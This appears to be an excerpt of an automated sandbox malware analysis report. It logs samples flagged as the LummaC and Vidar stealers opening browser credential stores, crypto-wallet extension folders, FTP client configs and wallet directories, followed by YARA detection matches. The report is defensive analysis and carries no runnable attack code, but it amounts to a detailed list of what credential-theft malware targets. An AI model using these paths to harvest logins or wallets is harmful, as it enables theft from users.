                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Exodus\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Binance\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: Dry.comBinary or memory string: WIN_81
                          Source: Dry.comBinary or memory string: WIN_XP
                          Source: Volunteer.28.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                          Source: Dry.comBinary or memory string: WIN_XPe
                          Source: Dry.comBinary or memory string: WIN_VISTA
                          Source: Dry.comBinary or memory string: WIN_7
                          Source: Dry.comBinary or memory string: WIN_8
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODI
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODI
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYC
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYC
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODI
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODI
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYC
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYC
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODI
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODI
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZW
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZW
                          Source: Yara matchFile source: 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3802571549.00000000005D1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3228675328.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Dry.com PID: 4952, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 4fa7efe79d.exe PID: 2252, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: Process Memory Space: 4fa7efe79d.exe PID: 2252, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 44.2.Dry.com.5d0000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000002C.00000003.3133503211.0000000004181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3807607263.00000000019D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3807607263.0000000001927000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3802571549.00000000005D1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000003.3133557173.0000000001937000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000003.3134030168.0000000004489000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Dry.com PID: 4952, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000A2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,44_2_000A2263
